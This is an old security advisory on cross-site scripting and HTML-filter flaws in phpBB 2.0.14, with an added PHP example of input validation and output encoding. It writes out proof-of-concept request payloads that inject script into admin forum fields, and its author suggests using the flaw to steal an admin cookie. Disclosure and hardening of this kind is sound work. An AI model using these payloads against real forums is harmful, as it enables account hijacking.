
| Subject: | -==phpBB 2.0.14 Multiple Vulnerabilities==- |
|---|---|
| Date: | 23 Apr 2005 22:43:45 -0000 |

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]. - Advisory #14 - 17/04/05
--------------------------------------------------------
Program: phpBB 2.0.14
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.14 & Lower versions
Risk: Low Risk!!
Impact: Multiple Vulnerabilities.

-==phpBB 2.0.14 Multiple Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

- Tested
---------------------------------------------------------
localhost & many forums

- Exploitation
---------------------------------------------------------
-==Bad Filter of HTML Code==-

phpBB2/profile.php?mode=viewprofile&u=\[]\
phpBB2/viewtopic.php?p=3&highlight=\[]\

#########################################################

-==XSS==-

POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1

forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum

Some people will not find it interesting, some will, but well, I don't care, because if you put in some effort you know that you can do a lot with this, like fooling the admin of the hosting to get his cookie and then get access to WHM...

- References
--------------------------------------------------------
http://neosecurityteam.net/Advisories/Advisory-14.txt

- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>

[N]eo [S]ecurity [T]eam [NST]. - http://neosecurityteam.net/

Got Questions? http://neosecurityteam.net/
Irc.gigachat.net #uruguay [NeoSecurity IRC]

- Greets
--------------------------------------------------------
Paisterist
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
And my Colombian people

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

*/
/* EOF */
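
The XSS request in the advisory above submits markup in `forumname` and `forumdesc`. As an added example (not part of the advisory and not phpBB's own code), the following shows one way to validate those create-forum fields and encode them on output so the submitted value renders as inert text. The function names and length limits are assumptions; the field names and sample values come from the request in the advisory.

```php
<?php
// Added example, not phpBB source. validate_forum_post() and h() are
// hypothetical names; the length limits are assumed values.

/** Validate the create-forum fields; returns a clean array or throws. */
function validate_forum_post(array $post): array
{
    $clean = [];
    // Text fields are stored as submitted; encoding happens at output time.
    foreach (['forumname' => 150, 'forumdesc' => 2000] as $key => $max) {
        $value = trim((string)($post[$key] ?? ''));
        if ($key === 'forumname' && $value === '') {
            throw new InvalidArgumentException("$key is required");
        }
        if (strlen($value) > $max) {
            throw new InvalidArgumentException("$key is too long");
        }
        $clean[$key] = $value;
    }
    // Numeric fields must be non-negative integers, never free text.
    foreach (['c', 'forumstatus', 'prune_days', 'prune_freq'] as $key) {
        $n = filter_var($post[$key] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
        if ($n === false) {
            throw new InvalidArgumentException("$key must be an integer >= 0");
        }
        $clean[$key] = $n;
    }
    return $clean;
}

/** Encode a stored value for an HTML text or quoted-attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample input mirroring the advisory's request body.
$post = [
    'forumname' => "<script>alert('NST')</script>",
    'forumdesc' => "<script>alert('NST')</script>",
    'c' => '1', 'forumstatus' => '0', 'prune_days' => '7', 'prune_freq' => '1',
];
$forum = validate_forum_post($post);

// Vulnerable pattern: raw interpolation, the stored markup reaches the browser as HTML.
$unsafe = "<a class=\"forumlink\">{$forum['forumname']}</a>";
// Hardened pattern: the same stored value, encoded where it is written into the page.
$safe = '<a class="forumlink">' . h($forum['forumname']) . '</a>';
echo $safe, PHP_EOL;
```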